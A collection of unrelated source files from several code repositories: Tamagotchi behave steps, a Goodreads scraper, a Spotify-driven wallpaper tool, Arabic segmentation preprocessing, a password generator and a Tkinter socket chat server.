collection.fillForm()
sleep(1)
msg = collection.submitForm()
return msg
elif user['user']['type'] in [1,2,3]:
# 以下代码是签到的代码
Utils.log('开始执行签到任务')
sign = AutoSign(wise, user['user'])
sign.getUnSignTask()
sleep(1)
sign.getDetailTask()
sign.fillForm()
sleep(1)
msg = sign.submitForm()
return msg
elif user['user']['type'] == 4:
# 以下代码是工作日志的代码
Utils.log('开始执行日志任务')
work = workLog(wise, user['user'])
work.checkHasLog()
sleep(1)
work.getFormsByWids()
work.fillForms()
sleep(1)
msg = work.submitForms()
return msg
# 阿里云的入口函数
def handler(event, context):
main()
# 腾讯云的入口函数
def main_handler(event, context):
main()
return 'Finished'
if __name__ == '__main__':
main()
``` |
{
"source": "7agustibm/kata.tamagotchi",
"score": 2
} |
#### File: features/steps/ChangingTamagotchiNeedsOverTime.py
```python
from behave import *
from nose.tools import eq_
use_step_matcher("re")
@when("time passes")
def step_impl(context):
context.tamagotchi.timePasses()
@step("it's hungriness is increased")
def step_impl(context):
eq_(6, context.tamagotchi.hungriness)
@step("it's happiness is decreased")
def step_impl(context):
eq_(4, context.tamagotchi.happiness)
```
#### File: features/steps/FeedingTamagotchi.py
```python
from behave import *
from nose.tools import eq_
from tamagochi.tamagochi import Tamagotchi
use_step_matcher("re")
@given("I have a Tamagotchi")
def step_impl(context):
context.tamagotchi = Tamagotchi()
@when("I feed it")
def step_impl(context):
context.tamagotchi.eat()
@then("it's hungriness is decreased")
def step_impl(context):
eq_(4, context.tamagotchi.hungriness)
@step("it's fullness is increased")
def step_impl(context):
eq_(6, context.tamagotchi.fullness)
```
#### File: features/steps/PlayingWithTamagotchi.py
```python
from behave import *
from nose.tools import eq_
use_step_matcher("re")
@when("I play with it")
def step_impl(context):
context.tamagotchi.play()
@then("it's happiness is increased")
def step_impl(context):
eq_(6, context.tamagotchi.happiness)
@step("it's tiredness is increased")
def step_impl(context):
eq_(6, context.tamagotchi.tiredness)
```
#### File: features/steps/PuttingTamagotchiToBed.py
```python
from behave import *
use_step_matcher("re")
@when("I put it to bed")
def step_impl(context):
context.tamagotchi.toBed()
@then("it's tiredness is decreased")
def step_impl(context):
"""
:type context: behave.runner.Context
"""
pass
``` |
{
"source": "7albertoh/insight_project",
"score": 3
} |
#### File: insight_project/scripts/clean_genre_25_pages.py
```python
import time
from pathlib import Path
import os
def extract_from_html():
data_path = str(Path(os.getcwd()).parents[0])+'/data/html_files/'
out_csv = []
for i in range(0,25):
soup = bs(open(data_path+str(i+1)+'.html',encoding="utf-8"),'html.parser')
titles = soup.find_all('a', class_='bookTitle')
authors = soup.find_all('a', class_='authorName')
gray_text = soup.find_all('span',class_='greyText smallText')
if not len(titles) == len(authors) == len(gray_text):
print('issue')
for i in range(0,len(titles)):
booktitlei = str(titles[i].string.encode("utf-8")).replace(",",";")[2:-1] # book title
bookrefi = str(titles[i]['href'].encode("utf-8")).replace(",",";")[2:-1]
authornamei = str(authors[i].string.encode("utf-8")).replace(",",";")[2:-1]
ratings_yeari = str(gray_text[i].string).replace('\n','').replace(",","").split()
avg_ratingi = ratings_yeari[2]
num_ratingsi = ratings_yeari[4]
yeari = ratings_yeari[8] if len(ratings_yeari) == 9 else ""
out_csv.append(booktitlei + "," + bookrefi + "," + authornamei + "," + avg_ratingi + "," +num_ratingsi + "," + yeari)
with open(str(Path(os.getcwd()).parents[0])+"/data/genre_25_pages.csv",'w') as f1:
f1.write('book_title, book_reference, author_names, avg_rating, num_ratings, year_published \n')
[f1.write(i+"\n") for i in out_csv]
def main():
extract_from_html()
if __name__ == "__main__":
main()
``` |
{
"source": "7alexvega/gradient",
"score": 3
} |
#### File: 7alexvega/gradient/gradient.py
```python
import atexit
import json
import os
import time
from config import config
from hue import Hue
from image import Image
from spotify import Spotify
from windows import Windows
class Gradient:
def __init__(self):
self.cache = self.get_cache()
def get_cache(self):
if os.path.exists('db.json'):
with open('db.json', 'r') as file:
cache = json.load(file)
else:
cache = dict()
return cache
def start(self):
spotify = Spotify()
windows = Windows()
image = Image()
hue = Hue()
atexit.register(windows.revert_wallpaper)
atexit.register(lambda: json.dump(self.cache, open('db.json', 'w')))
previous_song = None
while True:
current_song = windows.get_current_song()
if current_song:
song_changed = current_song != previous_song
if song_changed:
previous_song = current_song
album_art_url = spotify.get_current_album_art_url()
album_key = album_art_url.rsplit('/')[-1]
if album_key in self.cache and os.path.exists(self.cache[album_key]):
wallpaper_path = self.cache[album_key]
else:
album_art = spotify.get_album_art_image(album_art_url)
wallpaper_path = image.create_wallpaper(album_art, album_key)
self.cache[album_key] = wallpaper_path
hue_lights = config['hue']['lights']
dominant_colors = image.get_dominant_colors(wallpaper_path, len(hue_lights))
for i in range(len(dominant_colors)):
light = hue_lights[i]
color = dominant_colors[i]
hue.update_light_color(light, color)
windows.set_wallpaper(wallpaper_path)
else:
windows.revert_wallpaper()
time.sleep(config['gradient']['refresh_delay_s'])
if __name__ == '__main__':
gradient = Gradient()
gradient.start()
``` |
{
"source": "7AM7/Arabic-dialects-segmenter-with-flask",
"score": 3
} |
#### File: API/model/preprocessing.py
```python
__author__ = '<NAME> (<EMAIL>)'
import re
import datetime
from nltk.tokenize import word_tokenize
import nltk
try:
nltk.data.find('tokenizers/punkt')
except LookupError:
nltk.download('punkt')
def valid_date(datestring):
try:
mat=re.match('^(\d{2})[/.-](\d{2})[/.-](\d{4})$', datestring)
if mat is not None:
datetime.datetime(*(map(int, mat.groups()[-1::-1])))
return True
except ValueError:
pass
return False
def valid_number(numstring):
try:
mat=re.match("^[-+]?[.]?[\d]+(?:,\d\d\d)*[\.]?\d*(?:[eE][-+]?\d+)?$", numstring)
if mat is not None:
return True
except ValueError:
pass
return False
def valide_time(timestring):
try:
mat=re.match('^(2[0-3]|[01]?[0-9]):([0-5]?[0-9])$', timestring)
if mat is not None:
datetime.time(*(map(int, mat.groups()[::])))
return True
mat=re.match('^(2[0-3]|[01]?[0-9]):([0-5]?[0-9]):([0-5]?[0-9])$', timestring)
if mat is not None:
datetime.time(*(map(int, mat.groups()[::])))
return True
mat=re.match('^(2[0-3]|[01]?[0-9]):([0-5]?[0-9]):([0-5]?[0-9]).([0-9]?[0-9])$', timestring)
if mat is not None:
datetime.time(*(map(int, mat.groups()[::])))
return True
except ValueError:
pass
return False
def valid_email(emailstring):
try:
mat=re.match('^[^@]+@[^@]+\.[^@]+$',emailstring)
if mat is not None:
return True
except ValueError:
pass
return False
def removeDiacritics(instring):
return re.sub(r'[ـًٌٍَُِّْ]', '', instring)
def tokenizeline(txtstring):
elements =[]
#Remove Kashida and diacritics.
txtstring = removeDiacritics(txtstring)
#Split on Arabic delimiters
for aword in re.split(r'،|٫|٫|٬|؛',txtstring):
for word in aword.split():
#print("==>",word)
if (word.startswith("#")
or word.startswith("@")
or word.startswith(":")
or word.startswith(";")
or word.startswith("http://")
or word.startswith("https://")
or valid_email(word)
or valid_date(word)
or valid_number(word)
or valide_time(word)):
elements.append(word)
else:
for elt in word_tokenize(word):
elements.append(elt)
output = ''
for elt in elements:
output = output + ' ' + elt
return output
```
#### File: dialects_segmenter_model/preprocessing/preprocessing.py
```python
import pandas as pd
import sys
import codecs
import os
HERE = os.getcwd() + '/'
data_path = os.path.join(HERE, 'data/SampleData.xlsx')
out_tweets_path = os.path.join(HERE, 'data/tweets.txt')
out_lookup_path = os.path.join(HERE, 'data/lookup_list.txt')
out_conll_path = os.path.join(HERE, 'data/joint.trian.3')
def create_dict_data(xls):
sheet_names = ['Ahmed', 'Omar', 'Sara', 'Ghassan']
seg_correct_dict = {}
for sheet_name in sheet_names:
df = pd.read_excel(xls, sheet_name)
df.name = sheet_name
Freq = df['Freq']
Word = df['Word']
Segments = df['Segments']
Corrections = df['Corrections']
for correct, seg in zip(Corrections, Segments):
correct = str(correct).strip()
seg = str(seg).strip()
if correct != "nan":
if seg not in seg_correct_dict:
seg_correct_dict[seg] = correct
return seg_correct_dict
def create_correct_tweets(xls, correct_dict):
tweets = []
Data_df = pd.read_excel(xls, 'Data')
for twet in Data_df['Tweet']:
text = str(twet).strip().split(' ')
t = ''
for word in text:
if word in correct_dict:
word = correct_dict[word]
t += word + ' '
tweets.append(t.strip())
return tweets
def convertTrainingData(infile, outfile, append=False):
fp = codecs.open(infile, 'r','utf-8')
if append:
output_file = open(outfile, "a")
else:
output_file= open(outfile, "w+")
for line in fp:
line = line.strip()
#print('In:',line)
if('<EOTWEET>' in line): #EOS
output_file.write(''+'\n')
#print('')
continue
for word in line.split():
for elt in word.split('+'):
if(len(elt)==1):
output_file.write(elt+'\t'+'S'+'\n')
#print(elt+'\t'+'S')
elif(len(elt)>=2):
output_file.write(elt[0]+'\t'+'B'+'\n')
#print(elt[0]+'\t'+'B')
for i in range(1, len(elt)-1):
output_file.write(elt[i]+'\tM'+'\n')
#print(elt[i]+'\tM')
output_file.write(elt[-1]+'\t'+'E'+'\n')
#print(elt[-1]+'\t'+'E')
output_file.write('WB\tWB'+'\n')
#print('WB\tWB')
fp.close()
output_file.close()
if __name__ == '__main__':
write_lookup = True
data_2_conll = True
append = True
xls = pd.ExcelFile(data_path)
seg_correct_dict = create_dict_data(xls)
corrected_tweets = create_correct_tweets(xls, seg_correct_dict)
# Write corrected tweets to new file
f= open(out_tweets_path,"w+")
for tweet in corrected_tweets:
f.write(tweet + '\n')
f.close()
# Write lookup list to new file
if write_lookup:
lookup_list = set(seg_correct_dict.values())
if append:
f= open(out_lookup_path, "a")
else:
f= open(out_lookup_path, "w+")
for word in lookup_list:
f.write(word + '\n')
f.close()
# Write converted conll data to new file
if data_2_conll:
convertTrainingData(out_tweets_path, out_conll_path, append=True)
```
#### File: Arabic-dialects-segmenter-with-flask/tests/test.py
```python
from FarasaPy3.api import FarasaPy3
class FarasaTest():
def __init__(self):
self.text = "بلادي وان جارت على عزيزة واهلي وان ضنوا على كرام"
self.farasaApi = FarasaPy3()
def test_segmentation():
assert self.farasaApi.Segmentation(text) == "بلاد+ي وان جار+ت على عزيز+ة و+اهلي وان ضن+وا على كرام", "incorrect Segmentation"
def test_lemmatization():
assert self.farasaApi.Lemmatization(text) == "بلد وان جارى على عزيز اهلي وان ضن على رام", "incorrect Lemmatization"
def test_pos():
assert self.farasaApi.POS(text) == "S NOUN PRON NOUN NOUN+NSUFF PREP NOUN+NSUFF CONJ NOUN NOUN V+PRON PREP NOUN E", "incorrect Lemmatization"
def test_spellcheck():
assert self.farasaApi.SpellCheck(text) == "بلادي وإن/وان جارت على عزيزة وأهلي/واهلي وإن/وان ضنوا على كرام", "incorrect Spellcheck"
def test_diacritization():
assert self.farasaApi.Diacritization(text) == "بِلادي وانْ جارَتْ عَلَى عَزيزَةٍ واهَّلي وانْ ضَنّوا عَلَى كِرامِ", "incorrect Diacritization"
def test_diacritizatioV2():
assert self.farasaApi.DiacritizationV2(text) == "بِلَادِي وَانْ جَارَتْ عَلَى عَزيزَةٍ واهَّلي وَانْ ضَنّوا عَلَى كِرامٍ", "incorrect DiacritizationV2"
def test_dialectdiacritization():
assert self.farasaApi.DialectDiacritization(text, "mor") == "بْلَادِي وَانْ جَارْتْ عْلَى عْزِيزَة وَاهْلِي وَانْ ضْنُّو عْلَى كَرَامْ", "incorrect DialectDiacritization"
def test_dialectarsegmentation():
assert self.farasaApi.DialectARSegmentation(text) == "بلاد+ي و+ان جار+ت على عزيز+ة و+اهل+ي و+ان ضن+وا على كرام", "incorrect DialectARSegmentation"
``` |
{
"source": "7AM7/package-example",
"score": 2
} |
#### File: package-example/package_am7/simple_sum.py
```python
import numpy
def simple_sum(x, y):
return x + y
``` |
{
"source": "7aman/ezsub",
"score": 2
} |
#### File: cli/commands/download.py
```python
from pathlib import Path
from ezsub import const
from ezsub.cache import Cache
from ezsub.mirrors import Mirror
from ezsub.destination import Destination
from ezsub.utils import to_screen, select, parse_lngs
from ezsub.errors import NoResultError, NothingToDownloadError, NetworkError
cur = const.Curser
def download(req):
site = Mirror(req.site)
site.select_first_responding()
cache = Cache()
destination = Destination(req.destination, req.group, req.open_after)
if req.exact:
results, selected = site.exact_search(req.exact)
else: # use title
results = site.search(req.title)
selected = select(results, req.auto_select)
if not selected:
raise NoResultError
paths = [results[s-1]['path'] for s in selected]
lngs = parse_lngs(req.lngs)
new_subs = prune(paths, lngs, site, cache)
if not new_subs:
raise NothingToDownloadError
if req.simulation:
n = len(new_subs)
for i, path in enumerate(new_subs):
file = cache.get_child(f'{path}.zip', mk_parents=True)
to_screen(f"\rcreating empty zip files... {i+1}/{n}", end='') # progress stats
cache.empty_zipfile(file)
else:
to_screen("\rcreating empty zip files... ", end='')
to_screen(f"{cur.CFH}done", style='ok')
else:
try:
to_download = site.mass_request(new_subs)
except Exception as error:
raise error
for index, item in enumerate(to_download):
to_download[index]['path'] = cache.get_child(f"{item['path']}.zip", mk_parents=True)
to_extract = site.mass_download(to_download)
destination.extract(to_extract)
return None
def prune(paths, lngs, site, cache):
pruned = []
for path in paths:
to_screen("\n url: ", end='')
to_screen(f"{site.base_url}{path}", style="info")
links = site.get_subs(path)
results = [
link
for link in links
if link.split('/')[-2] in lngs.values() # filter language
]
splitted = count_each_language(results, lngs)
to_screen(" all: ", end='')
to_screen(splitted, style="ok")
new_subs = [
path
for path in results
if not cache.exists(f'.{path}.zip') # filter already downloaded
]
splitted = count_each_language(new_subs, lngs)
to_screen(" new: ", end='')
to_screen(splitted, style="ok")
pruned = pruned[:] + new_subs[:]
splitted = count_each_language(pruned, lngs)
to_screen("\ntotal: ", end='')
to_screen(splitted, style="ok")
return pruned
def count_each_language(results, lngs):
splitted = {lng: 0 for lng in lngs.keys()}
mapper = {language: lng for lng, language in lngs.items()}
for link in results:
language = link.split('/')[-2]
splitted[mapper[language]] += 1
# remove empty languages
splitted = {key: value for key, value in splitted.items() if value}
return splitted
```
#### File: cli/commands/info.py
```python
import os
from ezsub import const
from ezsub.cache import Cache
from ezsub.errors import CacheIsEmptyError
from ezsub.utils import to_screen, get_size, get_title, machine_readable, count_children
def info(req):
cache = Cache()
path = cache.subtitles
if not os.listdir(path):
raise CacheIsEmptyError
else:
size = get_size(path, 'human')
children = count_children(path, 0, generation=1)
total = count_children(path, 0, generation=3)
basic_info(path, size, children, total)
to_screen()
if req.verbosity >= 1:
level_one(path, req.sort)
to_screen()
return None
LANGMAX = 15
SIZEMAX = 10
COUNTMAX = 6
SPACING = 3
BAR = 41
SYMBOL = '#'
def basic_info(path, size, children, total):
TAB = 2
to_screen(f"\nezsub ver {const.__version__}")
to_screen('\n[basic info]')
to_screen(f'{" "*TAB}Path : {path}')
to_screen(f'{" "*TAB}Size : {size}')
to_screen(f'{" "*TAB}Titles : {children}')
to_screen(f'{" "*TAB}Subtitles: {total}')
return None
def level_one(path, sort_key):
items = get_sorted_items(path, sort_key)
tick = {'s': '', 'n': '', 't': ''}
tick[sort_key] = SYMBOL
headers = [
f'{tick["n"]}Files'.rjust(COUNTMAX),
f'{tick["s"]}Size'.rjust(SIZEMAX),
f'{tick["t"]}Title'
]
header = (' '*SPACING).join(headers)
subheaders = ["="*COUNTMAX, "="*SIZEMAX, "="*BAR]
subheader = (" "*SPACING).join(subheaders)
to_screen(header)
to_screen(subheader)
for item in items:
row_items = [
str(item['n']).rjust(COUNTMAX),
item['s'].rjust(SIZEMAX),
item['t']
]
to_screen((' '*SPACING).join(row_items))
to_screen(subheader)
to_screen(header)
to_screen(f'\nresults are sorted by {SYMBOL} marked column.\n', style="warn")
return None
def get_sorted_items(path, sort_key):
items = list()
for child in path.iterdir():
items.append({
't': get_title(child),
's': get_size(child, 'human'),
'n': count_children(child, 0, generation=2)
})
def key(x):
if sort_key == 's':
return machine_readable(x[sort_key])
else:
return x[sort_key]
reverse = False if sort_key == 't' else True
return sorted(items, key=key, reverse=reverse)
```
#### File: ezsub/cli/__init__.py
```python
import sys
import logging
import argparse
from ezsub import const
from ezsub.utils import to_screen
from ezsub.cli.commands import (
download, config, update, login, backup, history, info, clean, unzip
)
from ezsub.errors import (
JobDone,
WrongLineNumberError,
NothingToCleanError,
NothingToDownloadError,
NothingToExtractError,
NoResultError,
CacheIsEmptyError,
NoSiteIsAvailableError,
GetContentFailed,
ForciblyClosedError,
NetworkError
)
def get_user_loglevel():
parser = argparse.ArgumentParser(add_help=False)
parser.add_argument("--loglevel")
args, _ = parser.parse_known_args(sys.argv[1:])
loglevel = args.loglevel
if loglevel:
numeric_level = getattr(logging, loglevel.upper(), None)
if isinstance(numeric_level, int):
to_screen(f"loglevel is set to {loglevel.upper()}", style="ok")
return loglevel.upper()
else:
to_screen(f"Invalid log level {loglevel}. Ignored.", style="warn")
return ''
logging.basicConfig(
filename=const.LOGFILE,
filemode=const.LOGFILEMODE,
level=get_user_loglevel() or const.LOGLEVEL,
format=const.LOGFORMAT
)
logger = logging.getLogger()
def main():
try:
req = history(sys.argv[1:])
if req.command not in ['update', 'u']:
update(just_remind=True)
if req.command in ['dl', 'd', 'download']:
download(req)
elif req.command in ['unzip', 'x']:
unzip(req)
elif req.command in ['config', 'cfg']:
config(req)
elif req.command in ['update', 'u']:
update()
elif req.command in ['login', 'l']:
login()
elif req.command in ['backup', 'b']:
backup(req)
elif req.command in ['info', 'i']:
info(req)
elif req.command in ['clean']:
clean(req)
except KeyboardInterrupt:
to_screen("\nTerminated by user.", style="red;bold")
except NothingToCleanError:
to_screen("\nNothing to clean.", style="warn;bold")
except NothingToExtractError:
to_screen("\nNothing to extract.", style="warn;bold")
except NothingToDownloadError:
to_screen("\nNothing to download.", style="warn;bold")
except NoResultError:
to_screen("\nNo Result for this title.", style="warn;bold")
except CacheIsEmptyError:
to_screen("\nCache folder is empty.", style="warn;bold")
except NoSiteIsAvailableError:
to_screen("\nSites are not accessible. check internet connection.", style="red;bold")
except GetContentFailed:
to_screen("\nGetting page content is failed. try later.", style="red")
except ForciblyClosedError:
to_screen("\nServer closed connections forcibly :(", style="red")
except NetworkError:
to_screen("\nNetwork error. See log for more details.", style="red")
except JobDone:
pass
except WrongLineNumberError:
to_screen("\nWrong line number", style="warn;bold")
to_screen('\a')
sys.exit(0)
if __name__ == "__main__":
main()
``` |
{
"source": "7amoodtarek/strong-password-generator",
"score": 3
} |
#### File: 7amoodtarek/strong-password-generator/main.py
```python
import logging as log
import random
from string import *
import hashlib
import binascii
import os
import colorama as cl
# Log file configuration
log.basicConfig(
level=log.INFO,
format="%(asctime)s -> %(message)s",
filename="generatedPasswords.log"
)
# Colorama configuration1
cl.init(autoreset=True)
error = cl.Fore.RED
success = cl.Fore.GREEN
message = cl.Fore.LIGHTWHITE_EX
menu_heading = cl.Fore.YELLOW
choices = cl.Fore.BLUE
warn = cl.Fore.LIGHTYELLOW_EX
# Errors
class LengthError(Exception):
pass
class EmptyCrap(Exception):
pass
def main():
def exiting_app():
# Holds the screen in case program ran as exe or other
import time
print(f"\n{success}Exiting...")
time.sleep(1)
exit()
# Password generating
def pass_gen_all(max_range_all):
# Initializing - removing unwanted characters from the variable
chars = list(printable) # Imported from string - Has all the possible printable characters in the ASCII
chars.pop(85)
for p in range(6):
chars.pop()
password = ""
max_range_all = int(max_range_all)
if max_range_all == 0:
exiting_app()
else:
for i in range(max_range_all):
password += random.choice(chars)
print(f"{message}Generated password: {success}{password}")
log.info(f"Password: {password}\n")
def pass_gen_nocapitals(max_range_nocapitals):
temp = ascii_lowercase + digits + punctuation # Imported from string.
chars = list(temp)
chars.pop(59)
password = ""
max_range_nocapitals = int(max_range_nocapitals)
if max_range_nocapitals == 0:
exiting_app()
exit()
else:
for i in range(max_range_nocapitals):
password += random.choice(chars)
print(f"{message}Generated password: {success}{password}")
log.info(f"Password: {password}\n")
def pass_gen_nosymbols(max_range_nosymbols):
chars = list(printable)
chars.pop(85)
for s in range(37):
chars.pop()
password = ""
max_range_nosymbols = int(max_range_nosymbols)
if max_range_nosymbols == 0:
exiting_app()
else:
for i in range(max_range_nosymbols):
password += random.choice(chars)
print(f"{message}Generated password: {success}{password}")
log.info(f"Password: {password}\n")
def int_length_checker(int_length):
if int(int_length) < 9 or int(int_length) > 42: # Editable
raise LengthError(f"{error}Please enter a range between 9 and 42. Mostly passwords below or above that range are not usable.")
def file_checker(filename):
if os.stat(filename).st_size == 0:
raise EmptyCrap
def app_starter():
print(f"""{message}
Random password generator by <NAME>.
Enter 0 to exit the program.
""")
def main_menu():
print(f"""{menu_heading}
Please select any of the below choices:
{choices}
1. Generate a random password
2. View all the generated passwords
3. Hash a password
4. View all the ASCII characters
5. Contact developer
6. Help
""")
def pass_options():
print(f"""{menu_heading}
Select one of the below options:
{choices}
1. Include everything (Recommended)
2. Don't include symbols
3. Don't include Uppercase letters
""")
def hash_options():
print(f"""{menu_heading}
Please choose one of the below hashing type:
{choices}
1. SHA256 (Recommended)
2. MD5
""")
# Extras & Details
def hash_details(salt_used, iteration_num):
print(f"""{message}
Details {"-" * 100}
{message}-> Salt used: {success}{salt_used}
{message}-> Number of iterations: {success}{iteration_num}
""")
# Starting of program
app_starter()
while True: # Infinite loop - program won't stop unless an argument of 0
try:
main_menu()
choice_num = int(input("> "))
if choice_num == 0:
exiting_app()
if choice_num == 1:
try:
print(f"{menu_heading}Enter a range: ")
max_range = int(input("> "))
if max_range == 0:
exiting_app()
int_length_checker(max_range)
while True:
try:
pass_options()
password_opt = int(input("> "))
if password_opt == 0:
exiting_app()
if password_opt == 1:
pass_gen_all(max_range)
break
elif password_opt == 2:
pass_gen_nosymbols(max_range)
break
elif password_opt == 3:
pass_gen_nocapitals(max_range)
break
else:
print(f"{error}Option {password_opt} is not in the list.")
except ValueError:
print(f"{error}We cannot process this with any non-integer argument. please enter a valid choice")
# EOFError and KeyboardInterrupt are errors that might occur when the user uses exiting shortcuts
except EOFError:
exiting_app()
except KeyboardInterrupt:
pass
except LengthError as e: # Line 35
print(e)
except ValueError:
print(f"{error}We cannot process this with any non-integer argument. please enter a valid range")
except EOFError:
exiting_app()
exit()
except KeyboardInterrupt:
pass
# Will return to main menu after procedure
elif choice_num == 2:
with open("generatedPasswords.log", "r") as f:
if os.stat("generatedPasswords.log").st_size == 0:
print(f"{error}You haven't generated any password yet!")
else:
print(f.read())
elif choice_num == 3:
try:
with open("salts.txt", "r") as f:
file = f.readlines()
if os.stat("salts.txt").st_size == 0:
print(f"{warn}Warning: salts.txt is empty. Your password can still be hashed but it's always a good idea to add salt to it")
else:
salt = random.choice(file)
hash_options()
hash_type = int(input("> "))
print(f"{menu_heading}Enter your password: ")
user_pass = input("> ")
iterations = random.randint(5000, 10000)
if hash_type == 0:
exiting_app()
if hash_type == 1:
try:
file_checker("salts.txt")
type_sha = hashlib.pbkdf2_hmac("sha256", user_pass.encode("utf-8"), salt.encode("utf-8"), iterations)
final_sha = str(binascii.hexlify(type_sha))
print(f"{message}Your hashed password: {success}{(final_sha[2 :]).rstrip(final_sha[-1])}")
hash_details(salt_used=salt, iteration_num=iterations)
except EmptyCrap:
type_sha = hashlib.sha256(user_pass.encode("utf-8"))
print(f"{message}Your hashed password: {success}{type_sha.hexdigest()}\n")
print(f"{warn}Warning: This is the original hash of your password and can be decrypted easily without a salt")
elif hash_type == 2:
try:
file_checker("salts.txt")
type_md5 = hashlib.pbkdf2_hmac("md5", user_pass.encode("utf-8"), salt.encode("utf-8"), iterations)
final_md5 = str(binascii.hexlify(type_md5))
print(f"{message}Your hashed password: {success}{(final_md5[2 :]).rstrip(final_md5[-1])}")
hash_details(salt_used=salt, iteration_num=iterations)
except EmptyCrap:
type_md5 = hashlib.md5(user_pass.encode("utf-8"))
print(f"{message}Your hashed password: {success}{type_md5.hexdigest()}\n")
print(f"{warn}Warning: This is the original hash of your password and can be decrypted easily without a salt")
else:
print(f"{error}Wait a sec.. For goodness sake dude, please choose from the list!")
except FileNotFoundError:
print(f"{error}Oops! It looks like salts.txt is deleted or either you didn't install it properly lol. Please reinstall this repository and try again")
except ValueError:
print(f"{error}The choice list is displayed with numbers nothing else. Please choose a valid choice.")
except EOFError:
exiting_app()
except KeyboardInterrupt:
pass
elif choice_num == 4:
print(f"{success}{printable}")
elif choice_num == 5:
with open("README.md", "r") as f:
print(f.read())
else:
print(
f"{error}You don't see an option {choice_num} there don't you? please select the choices that are available.")
except ValueError:
print(
f"{error}The choice list is displayed with numbers nothing else. Please choose depends on the choice list.")
except EOFError:
exiting_app()
except KeyboardInterrupt:
exiting_app()
if __name__ == "__main__":
main()
# End of the script.
``` |
{
"source": "7amoodtarek/wifi-password-finder",
"score": 3
} |
#### File: 7amoodtarek/wifi-password-finder/run.py
```python
import os
from sys import platform
def main():
try:
# Since the os.system commands for each operating system is different.
if platform == 'win32':
os.system("python3 win.py")
elif platform == 'darwin':
os.system("python3 mac.py")
elif platform == 'linux':
os.system("python3 linux.py")
# This will happen probably if the client is using a different shell in a particular os.
else:
with open("README.md", 'r') as f:
print(f.read())
from time import sleep
print("exiting after 20 seconds")
sleep(20)
except (KeyboardInterrupt, EOFError):
exit("\nEXITED")
if __name__ == '__main__':
main()
``` |
{
"source": "7andahalf/PyChat-GUI",
"score": 3
} |
#### File: PyChat-GUI/gui_server/server.py
```python
import curses
import socket
import threading
import time
import sys
import subprocess
import ctypes
from Tkinter import *
import tkMessageBox,Tkinter
import util
DATA_BUFFER= lambda x:x
f = open("chat history.txt","a")
i=0
# THREADED CLASS FOR RECEIVING
class server_receive(threading.Thread):
def __init__(self,conn,client_name, m):
threading.Thread.__init__(self)
self.conn = conn
self.stop=False
self.m = m
server_receive.client_name = client_name
def message_receive(self):
data = self.conn.recv(DATA_BUFFER(1024))
self.conn.send('OK')
return self.conn.recv(DATA_BUFFER(1024))
raise IOError
def run(self):
while not self.stop:
global i
try:
message = self.message_receive()
except IOError:
print "Client has closed PyChat window ! Press ctrl +c to exit"
f.close()
sys.exit()
frame = self.m.mframe
subFrame = Frame(frame, height = 20, width = 460)
subFrame.grid(row=i,column=0)
Label(subFrame,text=server_receive.client_name+" : "+str(message)).place(x=5,y=0)
i+=1
# CONNECTS THE SOCKETS TO THE CORRESPONDING SEND AND RECEIVE CONNECTIONS
def SetConnection(conn1,conn2):
connect={}
state = conn1.recv(9)
conn2.recv(9)
if state =='WILL RECV':
connect['send'] = conn1 # server will send data to reciever
connect['recv'] = conn2
else:
connect['recv'] = conn1 # server will recieve data from sender
connect['send'] = conn2
return connect
# FUNCTION WHICH HELPS IN SENDING THE MESSAGE
def message_send(conn,server_name,msg,slf):
global i
frame = slf.mframe
subFrame = Frame(frame, height = 20, width = 460)
subFrame.grid(row=i,column=0)
Label(subFrame,text=server_name+" : "+str(msg)).place(x=5,y=0)
i+=1
if len(msg)<=999 and len(msg)>0:
conn.send(str(len(msg)))
if conn.recv(2) == 'OK':
conn.send(msg)
else:
conn.send(str(999))
if conn.recv(2) == 'OK':
conn.send(msg[:999])
message_send(conn,msg[1000:]) # calling recursive
# INITIAL SPLASH SCREEN
def server_initialize():
# Init
l = []
class loading(util.window):
def __init__(self):
# Init
util.window.__init__(self,"PyChat | Welcome",width = 500, height=600)
# image
canvas = Canvas(width = 500, height = 600, bg = 'white')
canvas.pack(expand = YES, fill = BOTH)
gif1 = PhotoImage(file = './data/1.gif')
canvas.create_image(0, 0, image = gif1, anchor = NW)
# Login frame
login_frame = Frame(self.root, height = 180, width = 400, relief = FLAT, bd = 1)
login_frame.place(x=40,y=350)
x,y = 70,20
Label(login_frame, text="Please enter your details to start chatting").place(x=x, y = y+0)
Label(login_frame, text="Host : ").place(x=x+0, y = y+30)
Label(login_frame, text="Port : ").place(x=x+0, y = y+60)
Label(login_frame, text="Name : ").place(x=x+0, y = y+90)
entry_host = Entry(login_frame)
entry_port = Entry(login_frame)
entry_name = Entry(login_frame)
entry_host.place(x=x+80, y = y+30)
entry_port.place(x=x+80, y = y+60)
entry_name.place(x=x+80, y = y+90)
Button(login_frame, text ="Start Chat", command=(lambda: self.start(entry_host.get(),entry_port.get(),entry_name.get()))).place(x=x+80, y = y+120)
# run
self.root.mainloop()
def start(self, host, port, name):
self.root.destroy()
l.append(host)
l.append(int(port))
l.append(name)
loading()
return l
def main():
HOST, PORT, server_name = server_initialize()
class mainw(util.window):
def __init__(self):
self.con = None
self.sname = None
# Init
util.window.__init__(self,"PyChat",width = 500, height=600)
main_frame = Frame(self.root, height = 500, width = 500, relief = RAISED, bd = 0)
main_frame.place(x=10,y=20)
def myfunction(event):
canvas.configure(scrollregion=canvas.bbox("all"),width=457,height=500)
canvas=Canvas(main_frame)
frame=Frame(canvas)
myscrollbar=Scrollbar(main_frame,orient="vertical",command=canvas.yview)
canvas.configure(yscrollcommand=myscrollbar.set)
myscrollbar.pack(side="right",fill="y")
canvas.pack(side="left")
canvas.create_window((0,0),window=frame,anchor='nw')
frame.bind("<Configure>",myfunction)
self.mframe = frame
x,y = 20,550
entry_msg = Entry(self.root, width=43)
entry_msg.place(x=x, y = y)
Button(self.root, text ="Send", command=(lambda: self.sendd(entry_msg.get()))).place(x=x+400, y = y)
def sendd(self, msg):
message_send(self.con,self.sname,msg,self)
m = mainw()
# SOCKET OBJECT INITIALIZATION
socket_object = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
socket_object.bind((HOST, PORT))
socket_object.listen(1)
# WAITING FOR CONNECTION ...
(conn1,addr1) = socket_object.accept()
(conn2,addr2) = socket_object.accept()
# CONNECTION ESTABLISHED !
#INITIALIZING SEND AND RECEIVE
connect = SetConnection(conn1,conn2)
# INITIALIZING SERVER AND CLIENT NAMES
conn2.send(server_name)
client_name = conn1.recv(DATA_BUFFER(1024))
receive = server_receive(connect['recv'],client_name,m)
receive.start()
m.con = connect['send']
m.sname = server_name
m.root.mainloop()
if __name__ == '__main__':
main()
``` |
{
"source": "7aske/instapy-bot",
"score": 2
} |
#### File: bot/utils/__init__.py
```python
